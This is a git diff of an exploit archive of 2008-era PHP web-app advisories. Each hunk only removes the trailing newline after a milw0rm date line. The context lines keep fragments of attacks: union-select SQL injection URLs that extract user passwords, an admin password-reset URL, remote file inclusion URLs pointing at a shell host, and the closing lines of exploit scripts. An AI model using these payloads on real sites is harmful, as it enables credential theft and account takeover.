[2008-04-04] \ No newline at end of file diff --git a/platforms/php/webapps/5359.txt b/platforms/php/webapps/5359.txt index d22563301..6a0ab1143 100755 --- a/platforms/php/webapps/5359.txt +++ b/platforms/php/webapps/5359.txt @@ -28,4 +28,4 @@ GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net ! --==+ Software Zone SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-04] +# milw0rm.com [2008-04-04] \ No newline at end of file diff --git a/platforms/php/webapps/5360.txt b/platforms/php/webapps/5360.txt index 957f551d0..a23a6efc9 100755 --- a/platforms/php/webapps/5360.txt +++ b/platforms/php/webapps/5360.txt @@ -28,4 +28,4 @@ ##################################################################################### -# milw0rm.com [2008-04-04] +# milw0rm.com [2008-04-04] \ No newline at end of file diff --git a/platforms/php/webapps/5362.txt b/platforms/php/webapps/5362.txt index 9bc00ae44..2528f3c78 100755 --- a/platforms/php/webapps/5362.txt +++ b/platforms/php/webapps/5362.txt @@ -37,4 +37,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org ! --==+ Comdev News Publisher SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-04] +# milw0rm.com [2008-04-04] \ No newline at end of file diff --git a/platforms/php/webapps/5363.txt b/platforms/php/webapps/5363.txt index 5461c63b2..a7894ebd6 100755 --- a/platforms/php/webapps/5363.txt +++ b/platforms/php/webapps/5363.txt @@ -29,4 +29,4 @@ GREETZ: milw0rm.com, H4CK-Y0u.org --==+ Affiliate Directory SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-04] +# milw0rm.com [2008-04-04] \ No newline at end of file diff --git a/platforms/php/webapps/5364.txt b/platforms/php/webapps/5364.txt index 3c309f397..224a3df09 100755 --- a/platforms/php/webapps/5364.txt +++ b/platforms/php/webapps/5364.txt @@ -31,4 +31,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org ! --==+ PHP Photo Gallery 1.0 SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-04] +# milw0rm.com [2008-04-04] \ No newline at end of file diff --git a/platforms/php/webapps/5365.txt b/platforms/php/webapps/5365.txt index b2db4dc48..21aa43c80 100755 --- a/platforms/php/webapps/5365.txt +++ b/platforms/php/webapps/5365.txt @@ -22,4 +22,4 @@ http://localhost/[script]/_blogadata/include/struct_main.php?incl_page=http://lo -- JIKI Team [ JIKO + KIl1er ] -- ------------------------------------------------------------------------- -# milw0rm.com [2008-04-04] +# milw0rm.com [2008-04-04] \ No newline at end of file diff --git a/platforms/php/webapps/5367.pl b/platforms/php/webapps/5367.pl index bde10c4de..52fecc9ca 100755 --- a/platforms/php/webapps/5367.pl +++ b/platforms/php/webapps/5367.pl @@ -73,4 +73,4 @@ sub inject_test { } } -# milw0rm.com [2008-04-04] +# milw0rm.com [2008-04-04] \ No newline at end of file diff --git a/platforms/php/webapps/5368.txt b/platforms/php/webapps/5368.txt index 8d13d59e7..b722333ae 100755 --- a/platforms/php/webapps/5368.txt +++ b/platforms/php/webapps/5368.txt @@ -31,4 +31,4 @@ http://www.site.com/_blogadata/include/sond_result.php?id_art=-99999/**/union/** -------------------------------- you can see in Blogator-script other injection bugs too ;) -# milw0rm.com [2008-04-04] +# milw0rm.com [2008-04-04] \ No newline at end of file diff --git a/platforms/php/webapps/5369.txt b/platforms/php/webapps/5369.txt index a6f7c1e74..72fea3ddc 100755 --- a/platforms/php/webapps/5369.txt +++ b/platforms/php/webapps/5369.txt @@ -8,4 +8,4 @@ include('../lang/'.$cal['lng'].'.php'); Vul Code : http://[site]/[path]/forum/kietu/libs/calendrier.php?cal[lng]=[LFI] -# milw0rm.com [2008-04-04] +# milw0rm.com [2008-04-04] \ No newline at end of file diff --git a/platforms/php/webapps/5370.txt b/platforms/php/webapps/5370.txt index 3a5ccf0aa..7fd73c601 100755 --- a/platforms/php/webapps/5370.txt +++ b/platforms/php/webapps/5370.txt @@ -34,4 +34,4 @@ http://www.site.com/_blogadata/include/init_pass2.php?c=[newpass]&a=[user id]&b= example:(change admin pass to 123456) http://www.site.com/_blogadata/include/init_pass2.php?c=123456&a=1&b=% -# milw0rm.com [2008-04-05] +# milw0rm.com [2008-04-05] \ No newline at end of file diff --git a/platforms/php/webapps/5371.txt b/platforms/php/webapps/5371.txt index a15da134b..3bd9217d9 100755 --- a/platforms/php/webapps/5371.txt +++ b/platforms/php/webapps/5371.txt @@ -32,4 +32,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew! --==+ Entertainment Directory <= 1.1 SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-05] +# milw0rm.com [2008-04-05] \ No newline at end of file diff --git a/platforms/php/webapps/5372.txt b/platforms/php/webapps/5372.txt index 35af88a9f..f85c32e43 100755 --- a/platforms/php/webapps/5372.txt +++ b/platforms/php/webapps/5372.txt @@ -29,4 +29,4 @@ GREETZ: milw0rm.com, H4CK-Y0u.org, CipherCrew! --==+ Easynet Forum Host SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-05] +# milw0rm.com [2008-04-05] \ No newline at end of file diff --git a/platforms/php/webapps/5374.txt b/platforms/php/webapps/5374.txt index 5a1f308a3..3dfab9875 100755 --- a/platforms/php/webapps/5374.txt +++ b/platforms/php/webapps/5374.txt @@ -37,4 +37,4 @@ GREETZ: milw0rm.com, H4CK-Y0u.org, CipherCrew! --==+ Gaming Directory 1.0 SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-05] +# milw0rm.com [2008-04-05] \ No newline at end of file diff --git a/platforms/php/webapps/5375.txt b/platforms/php/webapps/5375.txt index 4f402f92a..65a067f1a 100755 --- a/platforms/php/webapps/5375.txt +++ b/platforms/php/webapps/5375.txt @@ -15,4 +15,4 @@ ^| Rfi : http://localhost/?_CONFIG[files][functions_page]=http://shell \ -# milw0rm.com [2008-04-05] +# milw0rm.com [2008-04-05] \ No newline at end of file diff --git a/platforms/php/webapps/5376.pl b/platforms/php/webapps/5376.pl index dc53c1dda..e9750750f 100755 --- a/platforms/php/webapps/5376.pl +++ b/platforms/php/webapps/5376.pl @@ -69,4 +69,4 @@ sub inject_test { } else { print "\nTarget Site Not Vulnerable! Exiting.."; exit; } } -# milw0rm.com [2008-04-05] +# milw0rm.com [2008-04-05] \ No newline at end of file diff --git a/platforms/php/webapps/5377.txt b/platforms/php/webapps/5377.txt index c64be7993..4159d73fe 100755 --- a/platforms/php/webapps/5377.txt +++ b/platforms/php/webapps/5377.txt @@ -38,4 +38,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! --==+ Links Directory 1.1 SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-05] +# milw0rm.com [2008-04-05] \ No newline at end of file diff --git a/platforms/php/webapps/5378.txt b/platforms/php/webapps/5378.txt index f0b8e7299..571e7e7c1 100755 --- a/platforms/php/webapps/5378.txt +++ b/platforms/php/webapps/5378.txt @@ -38,4 +38,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! --==+ Software Index 1.1 SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-05] +# milw0rm.com [2008-04-05] \ No newline at end of file diff --git a/platforms/php/webapps/5379.txt b/platforms/php/webapps/5379.txt index b0a382834..ec8ef6d89 100755 --- a/platforms/php/webapps/5379.txt +++ b/platforms/php/webapps/5379.txt @@ -26,4 +26,4 @@ # # ############################################################################################################################################### -# milw0rm.com [2008-04-06] +# milw0rm.com [2008-04-06] \ No newline at end of file diff --git a/platforms/php/webapps/5380.txt b/platforms/php/webapps/5380.txt index f801bb27f..adb72b1bf 100755 --- a/platforms/php/webapps/5380.txt +++ b/platforms/php/webapps/5380.txt @@ -19,4 +19,4 @@ table of member is blog_utilisateurs -- JIKI Team [ JIKO + KIl1er ] -- ------------------------------------------------------------------------- -# milw0rm.com [2008-04-06] +# milw0rm.com [2008-04-06] \ No newline at end of file diff --git a/platforms/php/webapps/5381.txt b/platforms/php/webapps/5381.txt index 0856d21a6..7937fd2aa 100755 --- a/platforms/php/webapps/5381.txt +++ b/platforms/php/webapps/5381.txt @@ -26,4 +26,4 @@ and has upload at templateZip -- JIKI Team [ JIKO + KIl1er ] -- ------------------------------------------------------------------------- -# milw0rm.com [2008-04-06] +# milw0rm.com [2008-04-06] \ No newline at end of file diff --git a/platforms/php/webapps/5382.txt b/platforms/php/webapps/5382.txt index 3a2fe43fc..239aaf61b 100755 --- a/platforms/php/webapps/5382.txt +++ b/platforms/php/webapps/5382.txt @@ -18,4 +18,4 @@ greetz : VoLqaN side note (thanks C0D3R-DZ): http://localhost/[script_path]/index.php?categorie=-1+union+select+1,2,concat(login,0x3a,pass),4,5,6+from+blog_utilisateurs/* -# milw0rm.com [2008-04-06] +# milw0rm.com [2008-04-06] \ No newline at end of file diff --git a/platforms/php/webapps/5383.txt b/platforms/php/webapps/5383.txt index 9126b1507..81dd0f1dd 100755 --- a/platforms/php/webapps/5383.txt +++ b/platforms/php/webapps/5383.txt @@ -42,4 +42,4 @@ note: i hacked sex and porn sites :(( but not changed pass --http://my.opera.com/SQL-Injection/blog/-# ########################################### -# milw0rm.com [2008-04-06] +# milw0rm.com [2008-04-06] \ No newline at end of file diff --git a/platforms/php/webapps/5384.txt b/platforms/php/webapps/5384.txt index 95780660b..83a398042 100755 --- a/platforms/php/webapps/5384.txt +++ b/platforms/php/webapps/5384.txt @@ -34,4 +34,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew! --==+ Prozilla Top 100 1.2 Arbitrary Delete Stats Vulnerability +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-06] +# milw0rm.com [2008-04-06] \ No newline at end of file diff --git a/platforms/php/webapps/5385.txt b/platforms/php/webapps/5385.txt index e29b5702b..f696c0171 100755 --- a/platforms/php/webapps/5385.txt +++ b/platforms/php/webapps/5385.txt @@ -38,4 +38,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! --==+ Prozilla Forum Service SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-06] +# milw0rm.com [2008-04-06] \ No newline at end of file diff --git a/platforms/php/webapps/5387.txt b/platforms/php/webapps/5387.txt index 940d8230c..1ca9531cf 100755 --- a/platforms/php/webapps/5387.txt +++ b/platforms/php/webapps/5387.txt @@ -49,4 +49,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! --==+ Prozilla Reviews Script 1.0 Arbitrary Delete User Vulnerability +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-06] +# milw0rm.com [2008-04-06] \ No newline at end of file diff --git a/platforms/php/webapps/5388.txt b/platforms/php/webapps/5388.txt index 75763dc1d..0b6fc54cf 100755 --- a/platforms/php/webapps/5388.txt +++ b/platforms/php/webapps/5388.txt @@ -37,4 +37,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! --==+ Prozilla Topsites 1.0 Arbitrary Edit/Add Users Vulnerability +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-06] +# milw0rm.com [2008-04-06] \ No newline at end of file diff --git a/platforms/php/webapps/5389.txt b/platforms/php/webapps/5389.txt index df2f06199..87a9b2200 100755 --- a/platforms/php/webapps/5389.txt +++ b/platforms/php/webapps/5389.txt @@ -35,4 +35,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org CipherCrew! --==+ Prozilla Cheat Script 2.0 SQL Injection Vulnerabilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-06] +# milw0rm.com [2008-04-06] \ No newline at end of file diff --git a/platforms/php/webapps/5390.txt b/platforms/php/webapps/5390.txt index 1a64de801..96ff14ec9 100755 --- a/platforms/php/webapps/5390.txt +++ b/platforms/php/webapps/5390.txt @@ -35,4 +35,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! --==+ Prozilla Freelancers SQL Injection Vulnerabilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-07] +# milw0rm.com [2008-04-07] \ No newline at end of file diff --git a/platforms/php/webapps/5391.php b/platforms/php/webapps/5391.php index 09238e30a..d105aef9e 100755 --- a/platforms/php/webapps/5391.php +++ b/platforms/php/webapps/5391.php @@ -150,4 +150,4 @@ print "\n\n[-] Successfull!\n"; ?> -# milw0rm.com [2008-04-07] +# milw0rm.com [2008-04-07] \ No newline at end of file diff --git a/platforms/php/webapps/5392.php b/platforms/php/webapps/5392.php index 0002fd2be..435f166f9 100755 --- a/platforms/php/webapps/5392.php +++ b/platforms/php/webapps/5392.php @@ -133,4 +133,4 @@ while(1) ?> -# milw0rm.com [2008-04-07] +# milw0rm.com [2008-04-07] \ No newline at end of file diff --git a/platforms/php/webapps/5393.txt b/platforms/php/webapps/5393.txt index 9b6bf6967..9bfc2fff3 100755 --- a/platforms/php/webapps/5393.txt +++ b/platforms/php/webapps/5393.txt @@ -34,4 +34,4 @@ Tryag TeaM & All Members Of My Forum -==========================================[ ViVa YeMeN ]====================================- -# milw0rm.com [2008-04-07] +# milw0rm.com [2008-04-07] \ No newline at end of file diff --git a/platforms/php/webapps/5394.txt b/platforms/php/webapps/5394.txt index ad01a561f..52ba89b92 100755 --- a/platforms/php/webapps/5394.txt +++ b/platforms/php/webapps/5394.txt @@ -28,4 +28,4 @@ # Greetz : Tryag-Team -JIKI Team -Stack-Terrorist [v40] -H-T Team -RoMaNcYxHaCkEr ############################################################################## -# milw0rm.com [2008-04-07] +# milw0rm.com [2008-04-07] \ No newline at end of file diff --git a/platforms/php/webapps/5399.txt b/platforms/php/webapps/5399.txt index 0ed544914..b63d1767d 100755 --- a/platforms/php/webapps/5399.txt +++ b/platforms/php/webapps/5399.txt @@ -13,4 +13,4 @@ # Greetz : Tryag-Team -JIKI Team GoLd_M [Mahmod_Ali] -H-T Team -RoMaNcYxHaCkEr -Str0ke ############################################################################## -# milw0rm.com [2008-04-07] +# milw0rm.com [2008-04-07] \ No newline at end of file diff --git a/platforms/php/webapps/5400.txt b/platforms/php/webapps/5400.txt index 4df2be678..c75862b00 100755 --- a/platforms/php/webapps/5400.txt +++ b/platforms/php/webapps/5400.txt @@ -28,4 +28,4 @@ # # ############################################################################################################################################### -# milw0rm.com [2008-04-07] +# milw0rm.com [2008-04-07] \ No newline at end of file diff --git a/platforms/php/webapps/5401.txt b/platforms/php/webapps/5401.txt index a896f2e25..16e8bef64 100755 --- a/platforms/php/webapps/5401.txt +++ b/platforms/php/webapps/5401.txt @@ -35,4 +35,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! --==+ My Gaming Ladder 7.5 AND Prior SQL Injection Vulnerbilitys +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-07] +# milw0rm.com [2008-04-07] \ No newline at end of file diff --git a/platforms/php/webapps/5402.txt b/platforms/php/webapps/5402.txt index efd0b10ed..42457a913 100755 --- a/platforms/php/webapps/5402.txt +++ b/platforms/php/webapps/5402.txt @@ -41,4 +41,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! --==+ iScripts SocialWare SQL Injection Vulnerbility +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-07] +# milw0rm.com [2008-04-07] \ No newline at end of file diff --git a/platforms/php/webapps/5404.php b/platforms/php/webapps/5404.php index 470141979..d8d0fd683 100755 --- a/platforms/php/webapps/5404.php +++ b/platforms/php/webapps/5404.php @@ -740,4 +740,4 @@ class phpsploit { } ?> -# milw0rm.com [2008-04-08] +# milw0rm.com [2008-04-08] \ No newline at end of file diff --git a/platforms/php/webapps/5405.txt b/platforms/php/webapps/5405.txt index 72923be23..6cf2efefd 100755 --- a/platforms/php/webapps/5405.txt +++ b/platforms/php/webapps/5405.txt @@ -60,4 +60,4 @@ # Use this at your own risk. You are responsible for your own deeds. # #====================================================================================================# -# milw0rm.com [2008-04-08] +# milw0rm.com [2008-04-08] \ No newline at end of file diff --git a/platforms/php/webapps/5406.txt b/platforms/php/webapps/5406.txt index daab75dbc..b0fbcd8d5 100755 --- a/platforms/php/webapps/5406.txt +++ b/platforms/php/webapps/5406.txt @@ -15,4 +15,4 @@ When the LIKE statement matches you get a "Not your link" error. Guido Landi -# milw0rm.com [2008-04-08] +# milw0rm.com [2008-04-08] \ No newline at end of file diff --git a/platforms/php/webapps/5407.php b/platforms/php/webapps/5407.php index aa614b0ad..a038ef5ac 100755 --- a/platforms/php/webapps/5407.php +++ b/platforms/php/webapps/5407.php @@ -111,4 +111,4 @@ while(1) ?> -# milw0rm.com [2008-04-08] +# milw0rm.com [2008-04-08] \ No newline at end of file diff --git a/platforms/php/webapps/5408.pl b/platforms/php/webapps/5408.pl index 7bb4ef63a..0855c3262 100755 --- a/platforms/php/webapps/5408.pl +++ b/platforms/php/webapps/5408.pl @@ -57,4 +57,4 @@ sub banner print "\n"; } -# milw0rm.com [2008-04-08] +# milw0rm.com [2008-04-08] \ No newline at end of file diff --git a/platforms/php/webapps/5410.txt b/platforms/php/webapps/5410.txt index c3f9ac2e0..ad78d7032 100755 --- a/platforms/php/webapps/5410.txt +++ b/platforms/php/webapps/5410.txt @@ -28,4 +28,4 @@ userid=1 - admin user have that userid, you can change that to another user. //EoFF -# milw0rm.com [2008-04-08] +# milw0rm.com [2008-04-08] \ No newline at end of file diff --git a/platforms/php/webapps/5411.txt b/platforms/php/webapps/5411.txt index f3b73a101..d5ea8a654 100755 --- a/platforms/php/webapps/5411.txt +++ b/platforms/php/webapps/5411.txt @@ -32,4 +32,4 @@ admin login=admin/login.php --http://my.opera.com/SQL-Injection/blog/-# ########################################### -# milw0rm.com [2008-04-08] +# milw0rm.com [2008-04-08] \ No newline at end of file diff --git a/platforms/php/webapps/5412.txt b/platforms/php/webapps/5412.txt index a57ded77b..00d8a5589 100755 --- a/platforms/php/webapps/5412.txt +++ b/platforms/php/webapps/5412.txt @@ -33,4 +33,4 @@ admin login=admin/login.php --http://my.opera.com/SQL-Injection/blog/-# ########################################### -# milw0rm.com [2008-04-08] +# milw0rm.com [2008-04-08] \ No newline at end of file diff --git a/platforms/php/webapps/5413.txt b/platforms/php/webapps/5413.txt index a5675c773..4e5a55da0 100755 --- a/platforms/php/webapps/5413.txt +++ b/platforms/php/webapps/5413.txt @@ -29,4 +29,4 @@ index.php?p=gallerypic&img_id=S@BUN&galid=-1+union+select+0,concat(email,0x3a,pa --http://my.opera.com/SQL-Injection/blog/-# ########################################### -# milw0rm.com [2008-04-08] +# milw0rm.com [2008-04-08] \ No newline at end of file diff --git a/platforms/php/webapps/5414.txt b/platforms/php/webapps/5414.txt index 4434236a1..3e692e816 100755 --- a/platforms/php/webapps/5414.txt +++ b/platforms/php/webapps/5414.txt @@ -29,4 +29,4 @@ index.php?area=1&p=gallery&action=showimages&galid=-1+union+select+0,concat(emai --http://my.opera.com/SQL-Injection/blog/-# ########################################### -# milw0rm.com [2008-04-08] +# milw0rm.com [2008-04-08] \ No newline at end of file diff --git a/platforms/php/webapps/5415.txt b/platforms/php/webapps/5415.txt index cb63fae8d..282c5f9f7 100755 --- a/platforms/php/webapps/5415.txt +++ b/platforms/php/webapps/5415.txt @@ -40,4 +40,4 @@ password under page --http://my.opera.com/SQL-Injection/blog/-# ########################################### -# milw0rm.com [2008-04-08] +# milw0rm.com [2008-04-08] \ No newline at end of file diff --git a/platforms/php/webapps/5417.htm b/platforms/php/webapps/5417.htm index 7296520ec..10204eb29 100755 --- a/platforms/php/webapps/5417.htm +++ b/platforms/php/webapps/5417.htm @@ -55,4 +55,4 @@ rfi.submit(); -# milw0rm.com [2008-04-09] +# milw0rm.com [2008-04-09] \ No newline at end of file diff --git a/platforms/php/webapps/5418.pl b/platforms/php/webapps/5418.pl index 8ebc41b07..ff5a62e7f 100755 --- a/platforms/php/webapps/5418.pl +++ b/platforms/php/webapps/5418.pl @@ -30,4 +30,4 @@ if($res->is_success) { print "\n\nExploit Success! Login to ".$url."administratorlogin.php with username: ".$usr." and password: ".$pwd."\n"; } -# milw0rm.com [2008-04-09] +# milw0rm.com [2008-04-09] \ No newline at end of file diff --git a/platforms/php/webapps/5419.txt b/platforms/php/webapps/5419.txt index f7c10c479..7f9c6a5b0 100755 --- a/platforms/php/webapps/5419.txt +++ b/platforms/php/webapps/5419.txt @@ -25,4 +25,4 @@ http://www.xxx.com/demos/galleryscriptlite/download.html?path=config.inc.php -- JIKI Team [ JIKO + KIl1er ] -- ------------------------------------------------------------------------- -# milw0rm.com [2008-04-09] +# milw0rm.com [2008-04-09] \ No newline at end of file diff --git a/platforms/php/webapps/5420.txt b/platforms/php/webapps/5420.txt index 989b23804..4efe7de37 100755 --- a/platforms/php/webapps/5420.txt +++ b/platforms/php/webapps/5420.txt @@ -41,4 +41,4 @@ function showSource($file, $line, $prev = 10, $next = 10) { ##################################################################################### -# milw0rm.com [2008-04-09] +# milw0rm.com [2008-04-09] \ No newline at end of file diff --git a/platforms/php/webapps/5421.txt b/platforms/php/webapps/5421.txt index f568990ae..05d4a9000 100755 --- a/platforms/php/webapps/5421.txt +++ b/platforms/php/webapps/5421.txt @@ -55,4 +55,4 @@ Password :[whatever] -------------- young iranian h4ck3rz -# milw0rm.com [2008-04-09] +# milw0rm.com [2008-04-09] \ No newline at end of file diff --git a/platforms/php/webapps/5422.pl b/platforms/php/webapps/5422.pl index 8e8217ac0..e95732c53 100755 --- a/platforms/php/webapps/5422.pl +++ b/platforms/php/webapps/5422.pl @@ -101,4 +101,4 @@ my @r = $res->content; $page="@r"; return $page;} -# milw0rm.com [2008-04-10] +# milw0rm.com [2008-04-10] \ No newline at end of file diff --git a/platforms/php/webapps/5423.txt b/platforms/php/webapps/5423.txt index f272eff84..aef494a06 100755 --- a/platforms/php/webapps/5423.txt +++ b/platforms/php/webapps/5423.txt @@ -28,4 +28,4 @@ ******************************************************************************************** -# milw0rm.com [2008-04-10] +# milw0rm.com [2008-04-10] \ No newline at end of file diff --git a/platforms/php/webapps/5425.pl b/platforms/php/webapps/5425.pl index 4d30d2b8d..9b43448f5 100755 --- a/platforms/php/webapps/5425.pl +++ b/platforms/php/webapps/5425.pl @@ -76,4 +76,4 @@ sub banner print "\n"; } -# milw0rm.com [2008-04-10] +# milw0rm.com [2008-04-10] \ No newline at end of file diff --git a/platforms/php/webapps/5426.txt b/platforms/php/webapps/5426.txt index 34bfb144f..7c429ba00 100755 --- a/platforms/php/webapps/5426.txt +++ b/platforms/php/webapps/5426.txt @@ -41,4 +41,4 @@ ADMiN LOGiN=admin.php?page=logfrm --http://my.opera.com/SQL-Injection/blog/-# ########################################### -# milw0rm.com [2008-04-10] +# milw0rm.com [2008-04-10] \ No newline at end of file diff --git a/platforms/php/webapps/5428.txt b/platforms/php/webapps/5428.txt index 60ac22ce2..5613ebedd 100755 --- a/platforms/php/webapps/5428.txt +++ b/platforms/php/webapps/5428.txt @@ -15,4 +15,4 @@ http://www.xxx.org/comment.php?ID=-67+union+select+concat(user(),char(32),databa greetz : VoLqaN ------------------------------------------------------------------------------------------------- -# milw0rm.com [2008-04-11] +# milw0rm.com [2008-04-11] \ No newline at end of file diff --git a/platforms/php/webapps/5429.txt b/platforms/php/webapps/5429.txt index a9ad72398..7e2a97bef 100755 --- a/platforms/php/webapps/5429.txt +++ b/platforms/php/webapps/5429.txt @@ -38,4 +38,4 @@ Tryag TeaM & All Members Of My Forum -==========================================[ ViVa Islam + YeMeN ]====================================- -# milw0rm.com [2008-04-11] +# milw0rm.com [2008-04-11] \ No newline at end of file diff --git a/platforms/php/webapps/5431.txt b/platforms/php/webapps/5431.txt index a12d8920d..06fb1d49c 100755 --- a/platforms/php/webapps/5431.txt +++ b/platforms/php/webapps/5431.txt @@ -38,4 +38,4 @@ side note: http://joomlacode.org/gf/project/joomlaxplorer/ 1.6.2 -# milw0rm.com [2008-04-11] +# milw0rm.com [2008-04-11] \ No newline at end of file diff --git a/platforms/php/webapps/5432.txt b/platforms/php/webapps/5432.txt index 6df091364..6c4e9700a 100755 --- a/platforms/php/webapps/5432.txt +++ b/platforms/php/webapps/5432.txt @@ -20,4 +20,4 @@ http://www.xxx.org/view.php?id=-1+union+select+1,2,3,convert(concat(database(),c http://coderx.org --------------------- -# milw0rm.com [2008-04-11] +# milw0rm.com [2008-04-11] \ No newline at end of file diff --git a/platforms/php/webapps/5433.txt b/platforms/php/webapps/5433.txt index fd3ab1fda..b9a106f8a 100755 --- a/platforms/php/webapps/5433.txt +++ b/platforms/php/webapps/5433.txt @@ -38,4 +38,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! --==+ CcMail <= 1.0.1 Insecure Cookie Handling +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-12] +# milw0rm.com [2008-04-12] \ No newline at end of file diff --git a/platforms/php/webapps/5434.pl b/platforms/php/webapps/5434.pl index 5781b4323..08e26df69 100755 --- a/platforms/php/webapps/5434.pl +++ b/platforms/php/webapps/5434.pl @@ -142,4 +142,4 @@ sub check_char return $res->is_success; } -# milw0rm.com [2008-04-13] +# milw0rm.com [2008-04-13] \ No newline at end of file diff --git a/platforms/php/webapps/5435.txt b/platforms/php/webapps/5435.txt index a79672396..1237295c5 100755 --- a/platforms/php/webapps/5435.txt +++ b/platforms/php/webapps/5435.txt @@ -23,4 +23,4 @@ example : ================================================================================================================= -# milw0rm.com [2008-04-13] +# milw0rm.com [2008-04-13] \ No newline at end of file diff --git a/platforms/php/webapps/5436.txt b/platforms/php/webapps/5436.txt index ad7fa54a1..702fb838a 100755 --- a/platforms/php/webapps/5436.txt +++ b/platforms/php/webapps/5436.txt @@ -26,4 +26,4 @@ WEBSiTE>>>http://www.xcorpitx-hack.com/Forum/ ********************S@BUN******************** ********************************************* -# milw0rm.com [2008-04-13] +# milw0rm.com [2008-04-13] \ No newline at end of file diff --git a/platforms/php/webapps/5437.txt b/platforms/php/webapps/5437.txt index 504f3e9c0..8fcbfa3c2 100755 --- a/platforms/php/webapps/5437.txt +++ b/platforms/php/webapps/5437.txt @@ -82,4 +82,4 @@ Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.com -# milw0rm.com [2008-04-13] +# milw0rm.com [2008-04-13] \ No newline at end of file diff --git a/platforms/php/webapps/5439.txt b/platforms/php/webapps/5439.txt index 6d2481018..75fa79b96 100755 --- a/platforms/php/webapps/5439.txt +++ b/platforms/php/webapps/5439.txt @@ -39,4 +39,4 @@ GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew ! --==+ PostCard 1.0 Insecure Cookie Handling (Arbitrary Authentication) +==-- --==+================================================================================+==-- -# milw0rm.com [2008-04-13] +# milw0rm.com [2008-04-13] \ No newline at end of file diff --git a/platforms/php/webapps/5440.php b/platforms/php/webapps/5440.php index e85459135..39cd69e42 100755 --- a/platforms/php/webapps/5440.php +++ b/platforms/php/webapps/5440.php @@ -68,4 +68,4 @@ print_r(' } ?> -# milw0rm.com [2008-04-13] +# milw0rm.com [2008-04-13] \ No newline at end of file diff --git a/platforms/php/webapps/5441.txt b/platforms/php/webapps/5441.txt index b4072b758..21cf93251 100755 --- a/platforms/php/webapps/5441.txt +++ b/platforms/php/webapps/5441.txt @@ -12,4 +12,4 @@ http://www.DZ-Secure.com --------------------- ############################################### -# milw0rm.com [2008-04-14] +# milw0rm.com [2008-04-14] \ No newline at end of file diff --git a/platforms/php/webapps/5443.txt b/platforms/php/webapps/5443.txt index 178dc5f10..73893559f 100755 --- a/platforms/php/webapps/5443.txt +++ b/platforms/php/webapps/5443.txt @@ -12,4 +12,4 @@ http://www.DZ-Secure.com --------------------- ############################################### -# milw0rm.com [2008-04-14] +# milw0rm.com [2008-04-14] \ No newline at end of file diff --git a/platforms/php/webapps/5444.txt b/platforms/php/webapps/5444.txt index b829706f6..47f2de26b 100755 --- a/platforms/php/webapps/5444.txt +++ b/platforms/php/webapps/5444.txt @@ -30,4 +30,4 @@ ## ############################################################################## -# milw0rm.com [2008-04-14] +# milw0rm.com [2008-04-14] \ No newline at end of file diff --git a/platforms/php/webapps/5446.txt b/platforms/php/webapps/5446.txt index bc79b6175..e45f05967 100755 --- a/platforms/php/webapps/5446.txt +++ b/platforms/php/webapps/5446.txt @@ -9,4 +9,4 @@ ## Exploit : " site.com/path/news.php?news=more&article=248+union%20select%200,1,username,password,4%20from%20bosdevUUS/* ############################################################################## -# milw0rm.com [2008-04-14] +# milw0rm.com [2008-04-14] \ No newline at end of file diff --git a/platforms/php/webapps/5447.txt b/platforms/php/webapps/5447.txt index 02197cf07..10eff6b88 100755 --- a/platforms/php/webapps/5447.txt +++ b/platforms/php/webapps/5447.txt @@ -50,4 +50,4 @@ --==+====================================================================================+==-- [+] [The End] -# milw0rm.com [2008-04-14] +# milw0rm.com [2008-04-14] \ No newline at end of file diff --git a/platforms/php/webapps/5448.txt b/platforms/php/webapps/5448.txt index 9cf37d047..583277b16 100755 --- a/platforms/php/webapps/5448.txt +++ b/platforms/php/webapps/5448.txt @@ -28,4 +28,4 @@ WEBSiTE: http://www.xcorpitx-hack.com/Forum ********************S@BUN******************** ********************************************* -# milw0rm.com [2008-04-14] +# milw0rm.com [2008-04-14] \ No newline at end of file diff --git a/platforms/php/webapps/5449.php b/platforms/php/webapps/5449.php index 999708eb2..bc11f1b5b 100755 --- a/platforms/php/webapps/5449.php +++ b/platforms/php/webapps/5449.php @@ -739,4 +739,4 @@ class phpsploit } ?> -# milw0rm.com [2008-04-14] +# milw0rm.com [2008-04-14] \ No newline at end of file diff --git a/platforms/php/webapps/5450.txt b/platforms/php/webapps/5450.txt index dffda9d36..f7f84c0eb 100755 